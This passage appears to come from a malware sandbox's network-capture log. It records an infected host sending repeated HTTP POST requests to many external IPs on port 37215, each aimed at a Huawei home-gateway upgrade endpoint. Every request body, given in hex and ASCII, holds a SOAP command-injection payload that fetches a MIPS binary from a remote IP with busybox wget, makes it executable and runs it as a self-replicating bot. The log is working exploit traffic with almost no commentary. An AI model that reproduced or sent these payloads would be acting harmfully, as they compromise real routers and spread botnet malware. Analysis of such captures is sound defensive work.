                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1806192.168.2.234100841.239.120.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586118937 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1807192.168.2.2340232157.74.77.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586132050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1808192.168.2.2357910157.72.203.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586329937 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1809192.168.2.234614441.198.206.13837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586330891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1810192.168.2.233953223.42.80.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586337090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1811192.168.2.2337324179.90.247.15137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586337090 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1812192.168.2.2336366165.60.208.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586350918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1813192.168.2.2356476157.122.220.9937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586379051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1814192.168.2.2337484197.57.199.9937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586406946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1815192.168.2.2346702157.89.171.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586416960 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
